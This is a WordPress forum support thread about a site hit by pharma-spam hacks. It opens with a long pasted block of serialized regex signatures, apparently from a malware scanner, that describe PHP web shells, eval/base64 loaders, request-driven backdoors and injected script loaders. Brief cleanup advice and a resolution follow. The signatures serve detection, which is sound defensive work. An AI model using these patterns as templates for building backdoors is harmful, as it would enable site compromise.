=]+[\@]?error_reporting\(.+?base64_decode\(.+?[\@]?error_reporting\(\2\)[; ]+\1/is";}s:43:"Tagged createElement script src appendChild";a:2:{i:0;s:5:"E2GBu";i:1;s:152:"/\/\* [0-9a-z]+ \*\/[\r\n \t]*.+([a-z0-9]+)[\t =]document\.createElement\(['"]S.+?\1\.src[\t= ]+.+?\.appendChild\(\1\).+?[\r\n \t]*\/\* [0-9a-z]+ \*\//i";}s:37:"PHP Vars Concat Variable Function END";a:2:{i:0;s:5:"E2I2w";i:1;s:259:"/<\?(php)?[\r\n \t]*(\$[a-z\_0-9]+[\t =]+['"].+?['"];[\r\n \t]*)+(\$[a-z\_0-9]+[\t =]+(\$[a-z\_0-9\[\]'"\r\n \t\.]+)+;[\r\n \t]*)+((\$[a-z\_0-9]+[\t =]+)?\$[a-z\_0-9\[\]'"\r\n \t]+\([\r\n \t]*(\$[a-z\_0-9\[\]'"\r\n \t\.\,]+)+\)[\r\n \t]*;[\r\n \t]*)+(\?>|$)/i";}s:65:"div script document getElementById visibility hidden display none";a:2:{i:0;s:5:"E2SAx";i:1;s:199:"/<div id=['"]([a-z\_0-9]+)['"].+?<\/div>[\t \r\n]*<script[^>]*>[\t \r\n]*.*?(document\.getElementById\(["']\1["']\)\.style\.(visibility|display)[\t =]+["'](hidden|none)["'];)+[\t \}\r\n]*<\/script>/i";}s:47:"add_action wp_footer serve example_admin_notice";a:2:{i:0;s:5:"E3HFH";i:1;s:159:"/add_action\([ \t]*['"]wp_footer['"][ ,\t]+['"]serve['"][ \t]*\);[ \t\r\n]*add_action\([ \t]*['"]admin_notices['"][ ,\t]+['"]example_admin_notice['"][ \t]*\);/";}s:51:"PHP error_reporting if !isset variable function END";a:2:{i:0;s:5:"E3N1H";i:1;s:123:"/<\?(php)?[\r\n \t]*[\@]?error_reporting\(0\); if \(\!isset\(.+?(\$[a-z\_0-9]+[\t =]+)?\$[a-z\_0-9\[\]'"\r\n \t]+\(.+?\?>/i";}s:66:"script if navigator userAgent match document write script src http";a:2:{i:0;s:5:"E3QCd";i:1;s:144:"/<script>[\t\r\n ]*if[\t \(]+navigator\.userAgent\.match\(.+?\{[\t\r\n ]*document\.write\(["']<scr.+? src=['"]http.+?\)[;\} \t\r\r]+<\/script>/i";}s:61:"php function Array return base64_decode php Variable function";a:2:{i:0;s:5:"E433U";i:1;s:400:"/<\?php[\t \r\n]+function ([a-z\-\_0-9]+)\(\$[a-z\-\_0-9]+\)[\t \{\r\n]+\$[a-z\-\_0-9]+[\t \=]+Array\(((".*?"|'.*?')[\t \.\,]*)+\);[ \t\r\n]*return base64_decode\(\$[a-z\-\_0-9]+\[\$[a-z\-\_0-9]+\]\);[} \t\r\n]+(\?><\?(php)?[ \t\r\n]+)?([\@]*\$[a-z\-\_0-9]+[ \t]*(\[[^\]]+\][ \t]*)*\(.+?[\)]+;[ \t\r\n]*)+(\$[a-z\-\_0-9]+[ \t\=]+\1\(.+?[\)]+;[ \t\r\n]*)+.+?if\(isset\(\$_REQUEST\[\1.+?[\t \r\n]*\?>/i";}s:25:"include_once rss-info.php";a:2:{i:0;s:5:"E439T";i:1;s:46:"/[\@]?include_once\(['"]rss-info\.php['"]\);/i";}s:21:"is_bot __via_content)";a:2:{i:0;s:5:"E4AF4";i:1;s:38:"/(?<=is_)bot \&\& \$__vi(?=a_content)/";}s:41:"set var str_replace var variable function";a:2:{i:0;s:5:"E4GKc";i:1;s:281:"/([\r\n \t]*(\$[a-z\_0-9\[\]]+)[='"a-z\_0-9\[\] ,\.\t]+;[\r\n \t]*\2[= \t]+str_replace\([='"a-z\_0-9\[\] ,\.\t]+\2\);)+([\r\n \t]*\$[a-z\_0-9\[\]]+[=\$'"a-z\_0-9\[\] ,\.\t]+;)*([\r\n \t]*(\$[a-z\_0-9\[\]]+[= \t]+)*\$['"a-z\_0-9\[\] ,\.\t]+\([\(=\$'"a-z\_0-9\[\] ,\.\t]+[\)'";]+)+/i";}}s:8:"backdoor";a:40:{s:21:"shell system passthru";a:2:{i:0;s:5:"D8DJ9";i:1;s:99:"/\<\?(.+?)(shell|authp)(.+?)error_reporting\(0\)(.+?)set_time_limit\(0\)(.+?)ini_set\(.+fopen\(.+/s";}s:18:"auth_pass FilesMan";a:2:{i:0;s:5:"CCIGG";i:1;s:71:"/\<\?(.+?)\$auth_pass(.+?)FilesMan(.+?)netstat(.+?)safe_mode.+(\?\>)*/s";}s:26:"GETdo_remove safe_mode end";a:2:{i:0;s:5:"CCUL3";i:1;s:114:"/if\(\$_GET\['do'\]=="remove"\)\{\nunlink\(getcwd\(\)\.\$_SERVER\["SCRIPT_NAME"\]\);.+safe_mode.+else.+'\.\$end;/s";}s:40:"set_error_handler eval file_get_contents";a:2:{i:0;s:5:"CCUL4";i:1;s:132:"/\<\?(php)*(.+?)error_reporting\((.+?)set_error_handler\((.+?)eval\((.*?)\$request(.+?)file_get_contents\('php\:\/\/input'\).+\?\>/s";}s:20:"GET_dl safe_mode end";a:2:{i:0;s:5:"CCUL4";i:1;s:132:"/\<\?(php)*[ \t\n\r]*if\(isset\(\$_GET\['dl'\]\)(.+?)safe_mode(.+?)\?\>[ \t\r\n]*\<\/div\>[ \t\r\n]*\<\/body\>[ \t\r\n]*\<\/html\>/s";}s:10:"unset self";a:2:{i:0;s:5:"D1MFe";i:1;s:45:"/\$__FILE__=__FILE__;.+unset\(\$__FILE__\);/s";}s:23:"clearstatcache here die";a:2:{i:0;s:5:"D5EA5";i:1;s:142:"/<\?(php)?[ \t\r\n]+(if\(isset\(\$_GET\[['"][0-9a-zA-Z]+['"]\]\)\)[ \t\r\n]*\{[ \t\r\n]+)?clearstatcache.+here;[ \t\r\n]+die;[\} \t\r\n]+\?>/s";}s:21:"keyspat viagra cialis";a:2:{i:0;s:5:"D1ON3";i:1;s:120:"/error_reporting\(0\);[ \t\r\n]+\$keyspat[= \t]+array\([ \t\r\n]*(['"](viagra|amoxicillin|cialis)['"][ \t\r\n,]+){2}.+/s";}s:18:"eval REQUEST alone";a:2:{i:0;s:5:"D249n";i:1;s:101:"/<\?php[\r\n \t]+[\@]?eval\([\@]?stripslashes\([\@]?\$_(REQUES|GE|POS)T\[[^\]]+\]\)\);[\r\n \t]+\?>/i";}s:33:"auth_pass FilesMan safe_mode eval";a:2:{i:0;s:5:"D49B2";i:1;s:74:"/\<\?(?=.*\$auth_pass)(?=.*FilesMan)(?=.*safe_mode)(?=.*eval\().+(\?\>)*/s";}s:18:"eval base64_decode";a:2:{i:0;s:5:"E2GCN";i:1;s:85:"/(\$[a-z\_0-9]+[= \t]+.+[;\r\n \t]+)*(echo )?[\@]?eval\(.*?base64_decode\(.+?[\)]+;/i";}s:51:"session_start error_reporting set_time_limit footer";a:2:{i:0;s:5:"D4JMh";i:1;s:120:"/\<\?php[\r\n \t]+session_start\(\);[\r\n \t]+error_reporting\(0\);[\r\n \t]+set_time_limit\(.+?<\? echo \$footer;\?>/is";}s:18:"function BSSV eval";a:2:{i:0;s:5:"D4NCC";i:1;s:69:"/(\/\*.*?\*\/[\r\n \t]*)*function BSSV\(.+eval\(BSSV\(.+?[\)]+[;]*/is";}s:23:"FilesMan preg_replace .";a:2:{i:0;s:5:"D5VBh";i:1;s:181:"/(?<=\<\?php).*["' ]F(["']\.["'])*i(["']\.["'])*l(["']\.["'])*e(["']\.["'])*s(["']\.["'])*M(["']\.["'])*a(["']\.["'])*n["' ];.*?preg_replace\(.+?["']\.["'][\)]+.*[\r\n \t]*(?=\?>)/i";}s:25:"function Array print exit";a:2:{i:0;s:5:"D4PAn";i:1;s:156:"/function[ \t]+[\_0-9a-z]+[ \t]*\([ \t]*\$[\_0-9a-z]+[ \t]*\)[ \t]*\{[\r\n \t]*\$[\_0-9a-z]+[= \t]+Array\(.+(print|echo) \$[\_0-9a-z]+[; \t]+exit[; \t]+\}/i";}s:33:"md5tagged eval variable functions";a:2:{i:0;s:5:"D59K8";i:1;s:170:"|<\?php[\r\n \t]+//[a-f0-9]{32}[\r\n \t]+(\$[\_a-z0-9]+[\r\n\= \t]+(//.+[\r\n \t]+)*['"][\=\_a-z\-0-9\\/]+['"][\r\n; \t]+(//.+[\r\n \t]+)*)+eval\([^;]+[\r\n; \t]+(\?>)*|i";}s:29:"if isset REQUEST eval REQUEST";a:2:{i:0;s:5:"D59Kp";i:1;s:188:"/if[\r\n\( \t]+isset[\r\n\( \t]+\$_(REQUES|GE|POS)T[\[\{]['"].+?['"][\]\}][\r\n\) \t]+[\r\n\{ \t]*eval[\r\n\( \t]+\$_(REQUES|GE|POS)T[\[\{]['"].+['"][\]\}][\r\n\) \t]+[\r\n; \t]*[\}]?[;]?/";}s:14:"GLOBALS 0 eval";a:2:{i:0;s:5:"D59MK";i:1;s:76:"/(\$(GLOBALS\[['"])*[0oO]+['"\]\=\. \t]+[^;]+;[\r\n \t]*)+eval\(.+[\)]+[;]*/";}s:32:"error_reporting password exit me";a:2:{i:0;s:5:"D5BBk";i:1;s:172:"/<\?(php)?[\r\n \t]*error_reporting\(0\);[\r\n \t]*\/\/If there is an error, we'll show it, k\?[\r\n \t]*\$password[= \t]+.+ :-\)[\r\n \t]*exit\(\);[\r\n \t]*\?>\.\$me\./is";}s:28:"php Starting calls c99shexit";a:2:{i:0;s:5:"D5DH7";i:1;s:106:"/<\?(php)*[\r\n \t]+\/\/Starting calls.+chdir\(\$lastdir\)[;\r\n \t]+[a-z0-9]+exit\(\)[;\r\n \t]*(\?>)*/is";}s:35:"if isset REQUEST foreach array eval";a:2:{i:0;s:5:"D5VDV";i:1;s:155:"/if[\r\n\( \t]+isset[\r\n\( \t]+\$_(REQUES|GE|POS)T[\[\{].+?[\]\}][\r\n\) \t]+.*?foreach\(array.*?eval[\r\n\( \t]+\$[^\)]+[\r\n\) \t]+[\r\n; \t]*[\}]?[;]?/";}s:20:"php password hg_exit";a:2:{i:0;s:5:"D8J7e";i:1;s:48:"/<\?(php)?(\s)+\$password(.+?)hg_exit\(\);(.+)/s";}s:72:"if empty SERVER HTTP_USER_AGENT set_time_limit move_uploaded_file return";a:2:{i:0;s:5:"D8MC6";i:1;s:163:"/<\?(php)?[\t \r\n]*if[ \t]*\(\!empty\(\$_SERVER\[["']HTTP_USER_AGENT["']\][\) ]+(.+?)set_time_limit\(0\)(.+?)move_uploaded_file\(.+return \$[a-z0-9]+[; \}]+\?>/is";}s:35:"error_reporting ini_set unlink FILE";a:2:{i:0;s:5:"D8VM5";i:1;s:74:"/[@]*error_reporting\(0\);[\r\n \t@]*ini_set\(.+[@]*unlink\(__FILE__\);/is";}s:31:"php if md5 REQUEST eval REQUEST";a:2:{i:0;s:5:"DA3A3";i:1;s:130:"/<\?(php)?[\r\n \t]+(\$[a-z\_0-9]+[\t =]+.+?;[\r\n\ \t]*)*if\(\(md5\(\$_REQUEST\[.+?eval\(\$[a-z\_0-9]+\(\$_REQUEST\[.*?;\}\}\?>/s";}s:33:"/auth_pass love set_error_handler";a:2:{i:0;s:5:"DAM9r";i:1;s:93:"/\<\?(?=.*\$auth_pass)(?=.*loveLogin)(?=.*lovesetcookie)(?=.*set_error_handler\().+(\?\>)*/is";}s:49:"function gzinflate base64_decode for chr ord eval";a:2:{i:0;s:5:"DBB1Y";i:1;s:292:"/function[ \t]+([\_0-9a-z]+)[ \t]*\([ \t]*(\$[\_0-9a-z]+)[ \t\)\{\r\n]+\2[= \t]+gzinflate\(base64_decode\(.+[\); \t\r\n]+for\(\$i=0;\$i<strlen\(\2\);\$i[\+\) \t\r\n]+\{[\t \r\n]*\2\[\$i\][= \t]+chr\(ord\(\2\[\$i\]\)-1[\); \t\r\n]+\}[\t \r\n]*return[ \t]\2[;\} \t\r\n]+eval\(\1\(.+?[\)]+[;]*/i";}s:18:"/function x eval x";a:2:{i:0;s:5:"DBB2n";i:1;s:107:"/function[ \t]+([\_0-9a-z]+)[ \t]*\([ \t]*(\$[\_0-9a-z]+)[ \t\)\{\r\n]+eval\(.+?\);\}[\t \r\n]*\1\(.+?\);/i";}s:11:"include GET";a:2:{i:0;s:5:"DBB8p";i:1;s:66:"/(include|require)(_once)?[\t \(]+\$_(POS|GE)T\[.+?[\] \t\)]+[;]*/";}s:22:"eval array_pop REQUEST";a:2:{i:0;s:5:"DBM95";i:1;s:63:"/eval\([\ta-z_0-9 \(]*array_pop\(\$_(GE|POS|REQUES)T[\)]+[;]*/i";}s:42:"if isset REQUEST eval or file_put_contents";a:2:{i:0;s:5:"DCIFB";i:1;s:171:"/if[ \t\r\n\(]+isset[\( \t\r\n]+\$_(REQUES|GE|POS)T\[[^\]]+\][\)\t \r\n]+\{[ \t\r\n]*(\$[_\.a-z0-9]+[= \t]+[^;]+;[ \t\r\n]*)+(eval|file_put_contents)\(.+?\);[ \t\r\n]*\}/i";}s:23:"if for unset wp_wp form";a:2:{i:0;s:5:"E3Q5u";i:1;s:88:"/(if|for|unset)[ \t]*\(\$wp[_]+wp[^;]+;.+?\?><form.+?name=['"]wp[_]+wp['"].+?<\/form>/is";}s:28:"assert Hex 64encodedText Hex";a:2:{i:0;s:5:"E24A7";i:1;s:158:"/(\$(color|auth|pass|default)[_\-\>\.a-z0-9]*[= \t]+(.+?);[ \t\n\r]*)*assert[\( \t]+"(\\x[0-9A-F][0-9A-F])+'[\/a-z\_0-9\=]+'(\\x[0-9A-F][0-9A-F])+"[\) \t]+;/i";}s:24:"web shell fopen passthru";a:2:{i:0;s:5:"E264q";i:1;s:69:"/^.+?error_reporting\(.+?web[ \t]*shell.+?fopen\(.+?passthru\(.+?$/is";}s:57:"php if is_dir file_get_contents if file_put_contents echo";a:2:{i:0;s:5:"E265k";i:1;s:235:"/<\?(php)?[\r\n \t]*(\$[a-z\_0-9]+[\t ]*=.+[\r\n \t]*)+if[\( \t]+is_dir.+[\r\n \t]*\$[a-z\_0-9]+[\t =]+file_get_contents.+[\r\n \t]*\$[a-z\_0-9]+[\t ]*=.+[\r\n \t]*if[\( \t]+file_put_contents.+[\r\n \t]*((echo|\}).+[\r\n \t]*)+(\?>)?/i";}s:53:"var functions return new RecursiveArrayIterator array";a:2:{i:0;s:5:"E266c";i:1;s:191:"/(\$[a-z\_0-9]+[\t =]+"[a-z\_\-\-9]*";[\r\n \t]*)+((\$[a-z\_0-9]+[\t =]+)?\$[a-z\_0-9]+\(+.+?[\)]+;[\r\n \t]*)+.+return[ \t]+new[ \t]+RecursiveArrayIterator[\( \t]+array.+?[\) \t]+;[\}]+/is";}s:76:"display_errors file_get_contents _REQUEST filename update_code fwrite unlink";a:2:{i:0;s:5:"E2B2t";i:1;s:139:"/^.+?display_errors.+?file_get_contents\(.+?\$_REQUEST\[["']filename["']\].+?\$_REQUEST\[["']update_code["']\].+?fwrite\(.+?unlink\(.+?$/is";}s:51:"display_errors create_wp_user REQUEST fwrite unlink";a:2:{i:0;s:5:"E2F9b";i:1;s:79:"/^.+?display_errors.+?create_wp_user\(\$_REQUEST\[.+?fwrite\(.+?unlink\(.+?$/is";}s:17:"php class viaWorm";a:2:{i:0;s:5:"E43Fx";i:1;s:185:"/<\?php([\t \r\n\/\*]+class viaWorm)+[\t \{\r\n]+.+?fwrite\(.+?file_get_contents\(.+?unlink\(.+?base64_encode\(.+?file_put_contents\(\$path, base64_decode\([\@]?file_get_contents\(.+/is";}s:42:"if isset REQUEST FILE stripslashes REQUEST";a:2:{i:0;s:5:"E4GHh";i:1;s:136:"/if \(isset\(\$_REQUEST\[.+?\][\) \{\t\r\n]+\$_FILE[= \t]+\$_REQUEST\[.+?\]\(.+\$_FILE\(stripslashes\(\$_REQUEST\[.+?\][\); \}\t\r\n]+/i";}}}
Any suggection?
Have you asked your host it they can help in any way?
Thats a Godaddy and they are not going to help.
They have replied:We cannot assist you with removing malware from your server. Consider taking your site down immediately to prevent infecting visitors, and take action quickly to identify/remove it.
If you are still having this issue. Please try the flilowing:
- Take full backup of your current site (files and database).
- Install a fresh instance of WordPress.
- Import your database in new instance.
- Verify everything is working as expected.
- If you are using a custom theme, check every theme file for this malware / suspicious data, then clean that and upload.
- For plugins, if easily possible download directly from WordPress site and place in your plugins flider. As the database would have their installed status, it should continue to work with out requiring any changes.
Finally fixed by removing embedded code from theme, plugins & database.
- The topic ‘Infected by Pharma Link Hacks’ is closed to new replies.